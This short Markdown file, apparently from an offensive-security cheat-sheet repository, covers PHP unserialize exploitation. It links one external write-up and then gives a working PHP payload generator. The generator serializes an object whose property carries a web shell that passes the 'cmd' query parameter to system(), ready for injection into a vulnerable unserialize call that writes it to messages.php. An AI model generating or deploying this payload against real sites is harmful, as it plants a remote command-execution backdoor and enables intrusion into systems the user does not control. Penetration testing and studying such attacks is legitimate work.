killchain-compendium/exploit/web/php/unserialize.md

21 lines
352 B
Markdown
Raw Normal View History

2021-11-24 23:52:42 +01:00
# Unserialize
* [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize/)
* Serialize via
```php
<?php
class FormSubmit {
public $form_file = 'messages.php';
public $message = '<?php
if(isset($_GET[\'cmd\']))
{
system($_GET[\'cmd\']);
}
?>';
}
print urlencode(serialize(new FormSubmit));
?>
```